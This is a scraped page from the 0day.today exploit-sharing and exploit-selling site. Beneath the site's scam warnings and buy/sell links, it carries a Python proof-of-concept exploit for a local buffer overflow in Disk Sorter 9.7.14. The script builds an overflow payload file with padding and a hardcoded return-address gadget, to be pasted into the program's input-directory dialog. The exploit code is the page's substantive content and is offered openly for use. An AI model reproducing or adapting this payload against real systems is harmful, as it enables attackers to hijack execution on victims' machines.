0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Disk Sorter 9.7.14 - Input Directory Local Buffer Overflow Exploit
#!/usr/bin/python ###################################### # Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC # Date: 25 May 2017 # Exploit Author: n3ckD_ # Vendor Homepage: http://www.disksorter.com/ # Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe # Version: Disk Sorter v9.7.14 (32-Bit) # Tested on: Windows 7 Enterprise SP1 (Build 7601) # Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog ###################################### print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC" print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog" # in libspg:.text # 10147C1C 58 POP EAX # 10147C1D C3 RETN ret = "\x1c\x7c\x14\x10" nops = "\x47\x4F"*24 buf = nops + "A"*4048 + ret + "MAGIC" + "\n" f = open("poc.txt","w") f.write(buf) f.close() # 0day.today [2024-11-15] #